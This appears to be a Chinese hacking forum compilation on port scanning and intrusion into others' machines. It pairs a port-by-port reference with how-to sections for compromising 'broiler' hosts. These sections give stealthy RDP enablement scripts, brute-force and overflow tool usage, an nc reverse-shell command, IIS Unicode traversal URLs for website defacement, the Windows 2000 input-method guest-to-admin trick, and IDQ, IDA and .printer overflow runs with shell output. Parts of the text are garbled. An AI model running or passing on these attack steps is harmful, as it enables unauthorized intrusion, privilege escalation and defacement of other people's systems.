端口扫描可以扫描哪些内容_vbs端口扫描器

hacker|
244

求个快速3389端口扫描器!

自做弱口令扫描器打开3389端口的四种 ***

一、打开记事本,编辑内容如下:

echo [Components] c:\sql

echo TSEnable = on c:\sql

sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q

编辑好后存为BAT文件,上传至肉鸡,执行。这里值得注意的是要确定winnt是否在c盘,如果在其他盘则需要改动。

二、 脚本文件本地打开3389端口(适用于win2000\xp)

工具:rots1.05

地址:

使用 *** :

在命令行方式下使用windows自带的脚本宿主程序cscript.exe调用脚本,例如:

c:\cscript ROTS.vbs 目标IP 用户名 密码 [服务端口] [自动重起选项]

服务端口: 设置终端服务的服务端口。默认是3389。

自动重起选项: 使用/r表示安装完成后自动重起目标使设置生效。

使用/fr表示强制重起目标。(如果/r不行,可以试试这个)

使用此参数时,端口设置不能忽略。

比如扫描到了一个有NT弱口令的服务器,IP地址是222.222.222.222,管理员帐户是administrator,密码为空

运行CMD(2000下的DOS),我们给它开终端!

命令如下!

cscript reg.vbe 222.222.222.222 administrator "" 3389 /fr

上面的命令应该可以理解吧?cscript reg.vbe这是命令,后面的是IP,然后是管理员帐户,接这是密码,因为222.222.222.222 这台服务器的管理员密码是空的,那就用双引号表示为空,再后面是端口,你可以任意设置终端的端口,/fr是重启命令(强制重启,一般我都用这个,你也可以/r,这是普通重启)

脚本会判断目标系统类型,如果不是server及以上版本,就会提示你是否要取消。

因为pro版不能安装终端服务。

如果你确信脚本判断错误,就继续安装好了。

如果要对本地使用,IP地址为127.0.0.1或者一个点(用.表示),用户名和密码都为空(用""表示)。

脚本访问的目标的135端口,如果目标135端口未开放,或者WMI服务关闭,那么脚本就没用了。

三、下载3389自动安装程序-djshao正式版5.0

地址

说明:解压djshao5.0.zip,把解压出来的djxyxs.exe上传到肉鸡的c:\winnt\temp下,然后进入c:\winnt\temp目录执行djxyxs.exe解压缩文件,然后再执行解压缩出来的azzd.exe文件,等一会肉鸡会自动重启!重启后会出现终端服务!

特点:1、不用修改注册表的安装路径,注册表会自动修改,安装完后会自动恢复到原来的安装路径

2、在后台安静模式运行,就算肉鸡旁有人也没有关系!

3、在添加和删除中看不出终端服务被安装的痕迹,也就是启动终端前不会打钩

4、不会在肉鸡上留下你的上传文件,在安装完终端服务后会会自动删除你上传到c:\winnt\temp下的任何文件!

5、不管肉鸡的winnt装在什么盘上都无所谓!

6、安装完终端后会删除在管理工具中的终端快捷图标!

7、在没有安装终端前,终端服务是被禁止的!安装终端后,终端服务被改为自动!但是如果在安装前终端服务是手动!安装后就可能还是手动!等重启后就不会打开服务!所以在软件中加了sc指令,等安装完后,不管终端服务是禁止还是手动还是自动,全部改为自动。

8、自动检测肉鸡是不是服务器版,如果不是,删除原文件,不执行安装,如果是服务器版就执行安装!

9、支持中日韩繁四个版本的win2000服务器版!

四、下载DameWare NT Utilities 3.66.0.0 注册版

地址

安装注册完毕后输入对方IP用户名密码,等待出现是否安装的对话框点是。

复制启动后出现对方桌面。

在对方桌面进入控制面版,点添加或删除程序。进入后点添加/删除windows组件,找到终端服务,点际进入后在启动终端服务上打上勾。确定自动提示重起,重起后OK

计算机端口是什么?请详细解释相关问题。谢谢!

计算机端口介绍

我们常常会在各类的技术文章中见到诸如135、137、139、443之类的“端口”,可是这些端口究竟有什么用呢?它会不会给我们的计算机带来潜在的威胁呢?究竟有多少端口是有用的?想要了解的话,就跟我来吧:D

端口可分为3大类:

1) 公认端口(Well Known Ports):从0到1023,它们紧密绑定于一些服务。通常这些端口的通讯明确表明了某种服务的协议。例如:80端口实际上总是HTTP通讯。

2) 注册端口(Registered Ports):从1024到49151。它们松散地绑定于一些服务。也就是说有许多服务绑定于这些端口,这些端口同样用于许多其它目的。例如:许多系统处理动态端口从1024左右开始。

3) 动态和/或私有端口(Dynamic and/or Private Ports):从49152到65535。理论上,不应为服务分配这些端口。实际上,机器通常从1024起分配动态端口。但也有例外:SUN的RPC端口从32768开始。

本节讲述通常TCP/UDP端口扫描在防火墙记录中的信息。记住:并不存在所谓ICMP端口。如果你对解读ICMP数据感兴趣,请参看本文的其它部分。 0 通常用于分析操作系统。这一 *** 能够工作是因为在一些系统中“0”是无效端口,当你试图使用一种通常的闭合端口连接它时将产生不同的结果。一种典型的扫描:使用IP地址为0.0.0.0,设置ACK位并在以太网层广播。

1 tcpmux 这显示有人在寻找SGI Irix机器。Irix是实现tcpmux的主要提供者,缺省情况下tcpmux在这种系统中被打开。Iris机器在发布时含有几个缺省的无密码的帐户,如lp, guest, uucp, nuucp, demos, tutor, diag, EZsetup, OutOfBox, 和4Dgifts。许多管理员安装后忘记删除这些帐户。因此Hacker们在Internet上搜索tcpmux并利用这些帐户。

7 Echo 你能看到许多人们搜索Fraggle放大器时,发送到x.x.x.0和x.x.x.255的信息。

常见的一种DoS攻击是echo循环(echo-loop),攻击者伪造从一个机器发送到另一个机器的UDP数据包,而两个机器分别以它们最快的方式回应这些数据包。(参见Chargen)

另一种东西是由DoubleClick在词端口建立的TCP连接。有一种产品叫做“Resonate Global Dispatch”,它与DNS的这一端口连接以确定最近的路由。

Harvest/squid cache将从3130端口发送UDP echo:“如果将cache的source_ping on选项打开,它将对原始主机的UDP echo端口回应一个HIT reply。”这将会产生许多这类数据包。

11 sysstat 这是一种UNIX服务,它会列出机器上所有正在运行的进程以及是什么启动了这些进程。这为入侵者提供了许多信息而威胁机器的安全,如暴露已知某些弱点或帐户的程序。这与UNIX系统中“ps”命令的结果相似 再说一遍:ICMP没有端口,ICMP port 11通常是ICMP type=11

19 chargen 这是一种仅仅发送字符的服务。UDP版本将会在收到UDP包后回应含有垃圾字符的包。TCP连接时,会发送含有垃圾字符的数据流知道连接关闭。Hacker利用IP欺骗可以发动DoS攻击。伪造两个chargen服务器之间的UDP包。由于服务器企图回应两个服务器之间的无限的往返数据通讯一个chargen和echo将导致服务器过载。同样fraggle DoS攻击向目标地址的这个端口广播一个带有伪造受害者IP的数据包,受害者为了回应这些数据而过载。 21 ftp 最常见的攻击者用于寻找打开“anonymous”的ftp服务器的 *** 。这些服务器带有可读写的目录。Hackers或Crackers 利用这些服务器作为传送warez (私有程序) 和pr0n(故意拼错词而避免被搜索引擎分类)的节点。 22 ssh PcAnywhere建立TCP和这一端口的连接可能是为了寻找ssh。这一服务有许多弱点。如果配置成特定的模式,许多使用RSAREF库的版本有不少漏洞。(建议在其它端口运行ssh) 还应该注意的是ssh工具包带有一个称为make-ssh-known-hosts的程序。它会扫描整个域的ssh主机。你有时会被使用这一程序的人无意中扫描到。 UDP(而不是TCP)与另一端的5632端口相连意味着存在搜索pcAnywhere的扫描。5632(十六进制的0x1600)位交换后是0x0016(使进制的22)。

23 Telnet 入侵者在搜索远程登陆UNIX的服务。大多数情况下入侵者扫描这一端口是为了找到机器运行的操作系统。此外使用其它技术,入侵者会找到密码。

25 *** tp 攻击者(spammer)寻找 *** TP服务器是为了传递他们的spam。入侵者的帐户总被关闭,他们需要拨号连接到高带宽的e-mail服务器上,将简单的信息传递到不同的地址。 *** TP服务器(尤其是sendmail)是进入系统的最常用 *** 之一,因为它们必须完整的暴露于Internet且邮件的路由是复杂的(暴露+复杂=弱点)。

53 DNS Hacker或crackers可能是试图进行区域传递(TCP),欺骗DNS(UDP)或隐藏其它通讯。因此防火墙常常过滤或记录53端口。

需要注意的是你常会看到53端口做为UDP源端口。不稳定的防火墙通常允许这种通讯并假设这是对DNS查询的回复。Hacker常使用这种 *** 穿透防火墙。

67和68 Bootp和DHCP UDP上的Bootp/DHCP:通过DSL和cable-modem的防火墙常会看见大量发送到广播地址255.255.255.255的数据。这些机器在向DHCP服务器请求一个地址分配。Hacker常进入它们分配一个地址把自己作为局部路由器而发起大量的“中间人”(man-in-middle)攻击。客户端向68端口(bootps)广播请求配置,服务器向67端口(bootpc)广播回应请求。这种回应使用广播是因为客户端还不知道可以发送的IP地址。

69 TFTP(UDP) 许多服务器与bootp一起提供这项服务,便于从系统下载启动代码。但是它们常常错误配置而从系统提供任何文件,如密码文件。它们也可用于向系统写入文件。

79 finger Hacker用于获得用户信息,查询操作系统,探测已知的缓冲区溢出错误,回应从自己机器到其它机器finger扫描。

98 linuxconf 这个程序提供linux boxen的简单管理。通过整合的HTTP服务器在98端口提供基于Web界面的服务。它已发现有许多安全问题。一些版本setuid root,信任局域网,在/tmp下建立Internet可访问的文件,LANG环境变量有缓冲区溢出。此外因为它包含整合的服务器,许多典型的HTTP漏洞可能存在(缓冲区溢出,历遍目录等)

109 POP2 并不象POP3那样有名,但许多服务器同时提供两种服务(向后兼容)。在同一个服务器上POP3的漏洞在POP2中同样存在。

110 POP3 用于客户端访问服务器端的邮件服务。POP3服务有许多公认的弱点。关于用户名和密码交换缓冲区溢出的弱点至少有20个(这意味着Hacker可以在真正登陆前进入系统)。成功登陆后还有其它缓冲区溢出错误。

111 sunrpc portmap rpcbind Sun RPC PortMapper/RPCBIND。访问portmapper是扫描系统查看允许哪些RPC服务的最早的一步。常见RPC服务有:rpc.mountd, NFS, rpc.statd, rpc.c *** d, rpc.ttybd, amd等。入侵者发现了允许的RPC服务将转向提供服务的特定端口测试漏洞。

记住一定要记录线路中的daemon, IDS, 或sniffer,你可以发现入侵者正使用什么程序访问以便发现到底发生了什么。

113 Ident auth 这是一个许多机器上运行的协议,用于鉴别TCP连接的用户。使用标准的这种服务可以获得许多机器的信息(会被Hacker利用)。但是它可作为许多服务的记录器,尤其是FTP, POP, IMAP, *** TP和IRC等服务。通常如果有许多客户通过防火墙访问这些服务,你将会看到许多这个端口的连接请求。记住,如果你阻断这个端口客户端会感觉到在防火墙另一边与e-mail服务器的缓慢连接。许多防火墙支持在TCP连接的阻断过程中发回RST,着将回停止这一缓慢的连接。

119 NNTP news 新闻组传输协议,承载USENET通讯。当你链接到诸如:news://comp.security.firewalls/. 的地址时通常使用这个端口。这个端口的连接企图通常是人们在寻找USENET服务器。多数ISP限制只有他们的客户才能访问他们的新闻组服务器。打开新闻组服务器将允许发/读任何人的帖子,访问被限制的新闻组服务器,匿名发帖或发送spam。

135 oc-serv MS RPC end-point mapper Microsoft在这个端口运行DCE RPC end-point mapper为它的DCOM服务。这与UNIX 111端口的功能很相似。使用DCOM和/或RPC的服务利用机器上的end-point mapper注册它们的位置。远端客户连接到机器时,它们查询end-point mapper找到服务的位置。同样Hacker扫描机器的这个端口是为了找到诸如:这个机器上运行Exchange Server吗?是什么版本? 这个端口除了被用来查询服务(如使用epdump)还可以被用于直接攻击。有一些DoS攻击直接针对这个端口。

137 NetBIOS name service nbtstat (UDP) 这是防火墙管理员最常见的信息,请仔细阅读文章后面的NetBIOS一节

139 NetBIOS File and Print Sharing 通过这个端口进入的连接试图获得NetBIOS/ *** B服务。这个协议被用于Windows“文件和打印机共享”和SAMBA。在Internet上共享自己的硬盘是可能是最常见的问题。 大量针对这一端口始于1999,后来逐渐变少。2000年又有回升。一些vbs(IE5 VisualBasic scripting)开始将它们自己拷贝到这个端口,试图在这个端口繁殖。

143 IMAP 和上面POP3的安全问题一样,许多IMAP服务器有缓冲区溢出漏洞运行登陆过程中进入。记住:一种Linux蠕虫(admw0rm)会通过这个端口繁殖,因此许多这个端口的扫描来自不知情的已被感染的用户。当RadHat在他们的Linux发布版本中默认允许IMAP后,这些漏洞变得流行起来。Morris蠕虫以后这还是之一次广泛传播的蠕虫。 这一端口还被用于IMAP2,但并不流行。 已有一些报道发现有些0到143端口的攻击源于脚本。

161 SNMP(UDP) 入侵者常探测的端口。SNMP允许远程管理设备。所有配置和运行信息都储存在数据库中,通过SNMP客获得这些信息。许多管理员错误配置将它们暴露于Internet。Crackers将试图使用缺省的密码“public”“private”访问系统。他们可能会试验所有可能的组合。 SNMP包可能会被错误的指向你的 *** 。Windows机器常会因为错误配置将HP JetDirect remote management软件使用SNMP。HP OBJECT IDENTIFIER将收到SNMP包。新版的Win98使用SNMP解析域名,你会看见这种包在子网内广播(cable modem, DSL)查询sysName和其它信息。

162 SNMP trap 可能是由于错误配置

177 xdmcp 许多Hacker通过它访问X-Windows控制台,它同时需要打开6000端口。

513 rwho 可能是从使用cable modem或DSL登陆到的子网中的UNIX机器发出的广播。这些人为Hacker进入他们的系统提供了很有趣的信息。

553 CORBA IIOP (UDP) 如果你使用cable modem或DSL VLAN,你将会看到这个端口的广播。CORBA是一种面向对象的RPC(remote procedure call)系统。Hacker会利用这些信息进入系统。

600 Pcserver backdoor 请查看1524端口 一些玩script的孩子认为他们通过修改ingreslock和pcserver文件已经完全攻破了系统-- Alan J. Rosenthal.

635 mountd Linux的mountd Bug。这是人们扫描的一个流行的Bug。大多数对这个端口的扫描是基于UDP的,但基于TCP的mountd有所增加(mountd同时运行于两个端口)。记住,mountd可运行于任何端口(到底在哪个端口,需要在端口111做portmap查询),只是Linux默认为635端口,就象NFS通常运行于2049端口。

1024 许多人问这个端口是干什么的。它是动态端口的开始。许多程序并不在乎用哪个端口连接 *** ,它们请求操作系统为它们分配“下一个闲置端口”。基于这一点分配从端口1024开始。这意味着之一个向系统请求分配动态端口的程序将被分配端口1024。为了验证这一点,你可以重启机器,打开Telnet,再打开一个窗口运行“natstat -a”,你将会看到Telnet被分配1024端口。请求的程序越多,动态端口也越多。操作系统分配的端口将逐渐变大。再来一遍,当你浏览Web页时用“netstat”查看,每个Web页需要一个新端口。

1025 参见1024

1026 参见1024

1080 SOCKS 这一协议以管道方式穿过防火墙,允许防火墙后面的许多人通过一个IP地址访问Internet。理论上它应该只允许内部的通信向外达到Internet。但是由于错误的配置,它会允许Hacker/Cracker的位于防火墙外部的攻击穿过防火墙。或者简单地回应位于Internet上的计算机,从而掩饰他们对你的直接攻击。WinGate是一种常见的Windows个人防火墙,常会发生上述的错误配置。在加入IRC聊天室时常会看到这种情况。

1114 SQL 系统本身很少扫描这个端口,但常常是sscan脚本的一部分。

1243 Sub-7木马(TCP) 参见Subseven部分。

1524 ingreslock后门 许多攻击脚本将安装一个后门Sh*ll 于这个端口(尤其是那些针对Sun系统中Sendmail和RPC服务漏洞的脚本,如statd, ttdbserver和cmsd)。如果你刚刚安装了你的防火墙就看到在这个端口上的连接企图,很可能是上述原因。你可以试试Telnet到你的机器上的这个端口,看看它是否会给你一个Sh*ll 。连接到600/pcserver也存在这个问题。

2049 NFS NFS程序常运行于这个端口。通常需要访问portmapper查询这个服务运行于哪个端口,但是大部分情况是安装后NFS 杏谡飧龆丝冢?acker/Cracker因而可以闭开portmapper直接测试这个端口。

3128 squid 这是Squid HTTP *** 服务器的默认端口。攻击者扫描这个端口是为了搜寻一个 *** 服务器而匿名访问Internet。你也会看到搜索其它 *** 服务器的端口:8000/8001/8080/8888。扫描这一端口的另一原因是:用户正在进入聊天室。其它用户(或服务器本身)Q9750406也会检验这个端口以确定用户的机器是否支持 *** 。

5632 pcAnywere 你会看到很多这个端口的扫描,这依赖于你所在的位置。当用户打开pcAnywere时,它会自动扫描局域网C类网以寻找可能得 *** (译者:指agent而不是proxy)。Hacker/cracker也会寻找开放这种服务的机器,所以应该查看这种扫描的源地址。一些搜寻pcAnywere的扫描常包含端口22的UDP数据包。参见拨号扫描。

6776 Sub-7 artifact 这个端口是从Sub-7主端口分离出来的用于传送数据的端口。例如当控制者通过 *** 线控制另一台机器,而被控机器挂断时你将会看到这种情况。因此当另一人以此IP拨入时,他们将会看到持续的,在这个端口的连接企图。(译者:即看到防火墙报告这一端口的连接企图时,并不表示你已被Sub-7控制。)

6970 RealAudio RealAudio客户将从服务器的6970-7170的UDP端口接收音频数据流。这是由TCP7070端口外向控制连接设置的。

13223 PowWow PowWow 是Tribal Voice的聊天程序。它允许用户在此端口打开私人聊天的连接。这一程序对于建立连接非常具有“进攻性”。它会“驻扎”在这一TCP端口等待回应。这造成类似心跳间隔的连接企图。如果你是一个拨号用户,从另一个聊天者手中“继承”了IP地址这种情况就会发生:好象很多不同的人在测试这一端口。这一协议使用“OPNG”作为其连接企图的前四个字节。

17027 Conducent 这是一个外向连接。这是由于公司内部有人安装了带有Conducent "adbot" 的共享软件。Conducent "adbot"是为共享软件显示广告服务的。使用这种服务的一种流行的软件是Pkware。有人试验:阻断这一外向连接不会有任何问题,但是封掉IP地址本身将会导致adbots持续在每秒内试图连接多次而导致连接过载: 机器会不断试图解析DNS名—ads.conducent.com,即IP地址216.33.210.40 ;216.33.199.77 ;216.33.199.80 ;216.33.199.81;216.33.210.41。(译者:不知NetAnts使用的Radiate是否也有这种现象)

27374 Sub-7木马(TCP) 参见Subseven部分。

30100 NetSphere木马(TCP) 通常这一端口的扫描是为了寻找中了NetSphere木马。

31337 Back Orifice “elite” Hacker中31337读做“elite”/ei’li:t/(译者:法语,译为中坚力量,精华。即3=E, 1=L, 7=T)。因此许多后门程序运行于这一端口。其中最有名的是Back Orifice。曾经一段时间内这是Internet上最常见的扫描。现在它的流行越来越少,其它的木马程序越来越流行。

31789 Hack-a-tack 这一端口的UDP通讯通常是由于"Hack-a-tack"远程访问木马(RAT, Remote Access Trojan)。这种木马包含内置的31790端口扫描器,因此任何31789端口到317890端口的连接意味着已经有这种入侵。(31789端口是控制连接,317890端口是文件传输连接)

32770~32900 RPC服务 Sun Solaris的RPC服务在这一范围内。详细的说:早期版本的Solaris(2.5.1之前)将portmapper置于这一范围内,即使低端口被防火墙封闭仍然允许Hacker/cracker访问这一端口。扫描这一范围内的端口不是为了寻找portmapper,就是为了寻找可被攻击的已知的RPC服务。 33434~33600 traceroute 如果你看到这一端口范围内的UDP数据包(且只在此范围之内)则可能是由于traceroute。参见traceroute部分。

41508 Inoculan 早期版本的Inoculan会在子网内产生大量的UDP通讯用于识别彼此。参见

(二) 下面的这些源端口意味着什么?

端口1~1024是保留端口,所以它们几乎不会是源端口。但有一些例外,例如来自NAT机器的连接。

常看见紧接着1024的端口,它们是系统分配给那些并不在乎使用哪个端口连接的应用程序的“动态端口”。 Server Client 服务 描述

1-5/tcp 动态 FTP 1-5端口意味着sscan脚本

20/tcp 动态 FTP FTP服务器传送文件的端口

53 动态 FTP DNS从这个端口发送UDP回应。你也可能看见源/目标端口的TCP连接。

123 动态 S/NTP 简单 *** 时间协议(S/NTP)服务器运行的端口。它们也会发送到这个端口的广播。

27910~27961/udp 动态 Quake Quake或Quake引擎驱动的游戏在这一端口运行其服务器。因此来自这一端口范围的UDP包或发送至这一端口范围的UDP包通常是游戏。

61000以上 动态 FTP 61000以上的端口可能来自Linux NAT服务器(IP Masquerade)

怎么扫描端口啊?入侵技术!

各种端口的入侵 ***

1. 1433端口入侵

scanport.exe 查有1433的机器

SQLScanPas*.**e 进行字典暴破(字典是关键)

最后 SQLTool*.**e入侵

对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。

nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口

(以上反向的,测试成功)

sqlhelloz.exe 入侵ip 1433 (这个是正向连接)

2. 4899端口入侵

用4899过滤器.exe,扫描空口令的机器

3. 3899的入侵

对很早的机器,可以试试3389的溢出(win3389ex.exe)

对2000的机器,可以试试字典暴破。(tscrack.exe)

4. 80入侵

对sp3以前的机器,可以用webdav入侵;

对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)

可以利用SQL进行注入。(啊D的注入软件)。

5. serv-u入侵(21端口)

对5. 004及以下系统,可用溢出入侵。(serv5004.exe)

对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)

对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)

输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码

6. 554端口

用real554.exe入侵。

7. 6129端口

用DameWare6129.exe入侵。

8. 系统漏洞

利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,

进行溢出入侵。

9. 3127等端口

可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。

10. 其他入侵

利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。

经典IPC$入侵

11.4779端口

s扫描器 加远程控制任我行

ROS无法使用telnet操作,winbox下想添加脚本scripts的添加按钮灰色

由于网上很多朋友问我怎么入侵别人的机器,所以整理了一些我认为容易学的漏洞入侵 *** ,希望能给初学者一些帮助,下面讲的内容很简单,高手就不用浪费时间看了,:)

(1) UNICODE漏洞入侵

“Uicode漏洞”是微软IIS的一个重大漏洞。2001年最热门漏洞之一。

之一步,运行RANGSCAN扫描器,会出现扫描窗口,在最上面有两个from的横框,这是让你填一段IP范围的。在之一个框里填入启始域(打个比方,比如你要扫192.168.0.1至192.168.0.255)那么你在之一个框里就填入192.168.0.1,在to 后面的框里填入192.168.0.255 意思就是扫192.168.0.0至192.168.0.255这段范围里有UNICODE漏洞的机器。接着在中间有一个添加的横框,是要填入内容的如:

/scripts/..%c0%af../winnt/system32/cmd.exe

这句话的意思是扫描有 %c0%af 漏洞的机器,对象一般是英文的WIN2000机。

我们把/scripts/..%c0%af../winnt/system32/cmd.exe填入框里,再按一下添加。再按“扫描”。就看到RANGSCAN开始扫了。这时就要看你选的IP范围有漏洞的机器多不多了,如果你选的IP范围好,呵,很快在扫描结果框里就会显示扫到的漏洞主机

如192.168.0.111/scripts/..%c0%af../winnt/system32/cmd.exe

意思是192.168.0.111主机有 %c0%af 漏洞,

目标有了,我们马上打开浏览器。在网址栏里输入:

100.100.100.111/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ 回车

意思是查看机器里C盘的根目录。一般情况下,我们都可以在浏览器里看到类似如:

Directory of c:\

2002-03-13 03:47p 289 default.asp

2002-02-11 03:47p 289 default.htm

2002-03-09 04:35p DIR Documents and Settings

2002-02-11 03:47p 289 index.asp

2002-02-11 03:47p 289 index.htm

2002-05-08 05:19a DIR Inetpub

2002-01-19 10:37p DIR MSSQL7

2002-03-09 04:22p DIR Program Files

2002-01-23 06:21p DIR WINNT

4 File(s) 1,156 bytes

5 Dir(s) 2,461,421,568 bytes free

------------------------------

的目录列表。也会碰到看不到文件的空目录。

好,我们成功看到了机器里的C盘了。

我们在浏览器里输入:

192.168.0.111/scripts/..%c0%af../winnt/system32/cmd.exe?/c+set 回车

CGI Error

The specified CGI application mi *** ehaved by not returning a complete set of HTTP headers. The headers it did return are:

ALLUSERSPROFILE=C:\Documents and Settings\All Users

CommonProgramFiles=C:\Program Files\Common Files

COMPUTERNAME=ON

ComSpec=C:\WINNT\system32\cmd.exe

CONTENT_LENGTH=0

GATEWAY_INTERFACE=CGI/1.1

HTTP_ACCEPT=image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*

HTTP_ACCEPT_LANGUAGE=zh-cn

HTTP_CONNECTION=Keep-Alive

HTTP_HOST=192.168.0.111

HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98; Win 9x 4.90)

HTTP_ACCEPT_ENCODING=gzip, deflate

HTTPS=off

INSTANCE_ID=1

LOCAL_ADDR=192.168.0.111

NUMBER_OF_PROCESSORS=1

Os2LibPath=C:\WINNT\system32\os2\dll;

OS=Windows_NT

Path=C:\WINNT\system32;C:\WINNT;C:\WINNT\System32\Wbem;C:\MSSQL7\BINN

PATH_TRANSLATED=c:\inetpub\wwwroot

PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;. *** ;. *** E;.WSF;.WSH

PROCESSOR_ARCHITECTURE=x86

PROCESSOR_IDENTIFIER=x86 Fa

-----------------

哈,我们看到了机器设置内容了,我们找找,主要看PATH_TRANSLATED=c:\inetpub\wwwroot

意思是他的主页存放在c:\inetpub\wwwroot的目录里,知道就好办了。

我们用命令:

192.168.0.111/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\inetpub\wwwroot回车

我们就可以看到c:\inetpub\wwwroot目录里的文件了,一般都有default.asp, default.htm , index.htm, index.asp,等等。我们以目录里有index.asp做例子。

我们先要做的是把文件的只读属性解除掉,很多管理员都把文件设置只读。

我们用命令:

192.168.0.111/scripts/..%c0%af../winnt/system32/attrib.exe?%20-r%20-h%20c:\inetpub\wwwroot\index.asp 回车

当看到下面的英文

CGI Error

The specified CGI application mi *** ehaved by not returning a complete

set of HTTP headers. The headers it did return are:

恭喜你,你可以改他的网页了。

----------------------------------------

但如果你看到下面的英文就不成功,只好换其他机器了。

CGI Error

The specified CGI application mi *** ehaved by not returning a complete set of HTTP headers. The headers it did return are:

Access denied - C:\inetpub\wwwroot\index.asp

-----------------------------

继续。现在用ECHO改网页的内容。

100.100.100.111/scripts/..%c0%af../winnt/system32/cmd".exe?/c+echo+网站有漏洞+ c:\inetpub\wwwroot\index.asp 回车

当看到

CGI Error

The specified CGI application mi *** ehaved by not returning a complete

set of HTTP headers. The headers it did return are:

的提示,你已经改了他的网页了,呵呵,你想改成什么字也行。只要把命令中的中文换成你自己的中文就行了。

英文WIN2000

/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\

中文WIN2000

/scripts/..%c0%2f../winnt/system32/cmd.exe

/scripts/..%c1%1c../winnt/system32/cmd.exe

WIN NT4

/scripts/..%c1%9c../winnt/system32/cmd.exe

英文WIN2000

/scripts/..%c0%af../winnt/system32/cmd.exe

通用代码:/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\

(2) Windows2000输入法漏洞

先用端口扫描器扫描开放3389的机器,然后用终端客户端程序进行连接,用CTRL+SHIFT快速切换输入法,切换至全拼,这时在登录界面左下角将出现输入法状态条,在输入法状态条上按鼠标右键。选择“帮助” —— “输入法指南” —— “选项”。(如果发现“帮助”呈灰色,放弃,因为对方很可能发现并已经补上了这个漏洞。)按右键,选择“跳转到URL”,输入:c:\winnt\system32在该目录下找到“net.exe”,为“net.exe”创建一个快捷方式,右键点击该快捷方式,在“属性” —“目标”—c:\winnt\system32\net.exe 后面空一格,填入“user guest /active :yes”。 点击“确定”(目的是,利用“net.exe”激活被禁止使用的guest账户)运行该快捷方式。(此时你不会看到运行状态,但guest用户已被激活。)然后重复操作上面的,在 “属性” —— “目标”—— c:\winnt\system32\net.exe 后面空一格,填入localgroup administrators guest /add(这一步骤目的是,利用“net.exe”将guest变成系统管理员。)再次登录终端服务器,以“guest”身份进入,此时guest已是系统管理员,已具备一切可执行权及一切操作权限。现在,我们可以像操作本地主机一样,控制对方系统。

(3) idq溢出漏洞

要用到3个程序,一个Snake IIS IDQ 溢出程序GUI版本,一个扫描器,还有NC。

首先扫描一台有IDQ漏洞的机器,然后设置Snake IIS IDQ 溢出程序,在被攻击IP地址后面写上对方的IP.端口号一般不需要改动,软件的默认绑定CMD.EXE的端口是813.不改了.用默认的,左面选择操作系统类型,随便选一个,我们选IIS5 English Win2k Sp0吧,点击IDQ溢出~~OK~~出现发送Shellcode成功的提示了,然后我们用NC来连接。

进入MS-DOS。进入“nc”的目录。然后:nc --v IP 813

c:\nc -vv IP 813

IP: inverse host lookup failed: h_errno 11004: NO_DATA

(UNKNOWN) [IP] 813 (?): connection refused

sent 0, rcvd 0: NOTSOCK

c:\

看来没成功. 别灰心,在来一次,换用IIS5 English Win2k Sp1试试。

c:\nc -vv IP 813

IP: inverse host lookup failed: h_errno 11004: NO_DATA

(UNKNOWN) [IP] 813 (?) open

Microsoft Windows 2000 [Version 5.00.2195]

(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32

哈哈,终于上来啦,你现在可是system权限,下面该怎么做就看你的啦。

(4)IDA溢出漏洞

所用程序:idahack

进入MS-DOS方式(假设idq.exe在c:\下)

c:\idahack.exe

运行参数:c:\idahack host hostport hosttype shellport

chinese win2k : 1

chinese win2ksp1: 2

chinese win2ksp2: 3

english win2k : 4

english win2ksp1: 5

english win2ksp2: 6

japanese win2k : 7

japanese win2ksp1: 8

japanese win2ksp2: 9

korea win2k : 10

korea win2ksp1: 11

korea win2ksp2: 12

chinese nt sp5 : 13

chinese nt sp6 : 14

c:\idahack 127.0.0.1 80 1 80

connecting...

sending...

Now you can telnet to 80 port

好 luck 

好,现在你可以telnet它的80端口了,我们用NC来连接。

C:\nc 127.0.0.1 80

Microsoft Windows 2000 [Version 5.00.2195]

(C)版权所有 1985-1998 Microsoft Corp

C:\WINNT\system32

OK,现在我们现在上来了,也可IDQ一样是SYSTEN权限,尽情的玩吧。

(5).printer漏洞

这个漏洞,我们用两个程序来入侵。iis5hack和nc。

C:\iis5hack

iis5 remote .printer overflow. writen by sunx

for test only, dont used to hack, :p

usage: D:\IIS5HACK.EXE Host HostPort HostType ShellPort

用法: D:\IIS5HACK 溢出的主机 主机的端口 主机的类型 溢出的端口

chinese edition: 0

chinese edition, sp1: 1

english edition: 2

english edition, sp1: 3

japanese edition: 4

japanese edition, sp1: 5

korea edition: 6

korea edition, sp1: 7

mexico edition: 8

mexico edition, sp1: 9

c:\iis5hack 127.0.0.19 80 1 119

iis5 remote .printer overflow. writen by sunx

for test only, dont used to hack, :p

Listn: 80

connecting...

sending...

Now you can telnet to 3739 port

好 luck

溢出成功!

c:\nc 127.0.0.19 119

Microsoft Windows 2000 [Version 5.00.2195]

(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32

OK,我们又成功取得system权限!玩吧。

(6)139端口入侵

我们先确定一台存在139端口漏洞的主机。用扫描工具扫描!比如SUPERSCAN这个端口扫描工具。假设现在我们已经得到一台存在139端口漏洞的主机,我们要使用nbtstat -a IP这个命令得到用户的情况!现在我们要做的是与对方计算机进行共享资源的连接。

用到两个NET命令,下面就是这两个命令的使用 ***

NET VIEW?

作 用:显示域列表、计算机列表或指定计算机的共享资源列表。?

命令格式:net view [\\computername | /domain[:domainname]]?

参数介绍:?

1键入不带参数的net view显示当前域的计算机列表。?

2\\computername 指定要查看其共享资源的计算机。?

3/domain[:domainname]指定要查看其可用计算机的域?

NET USE?

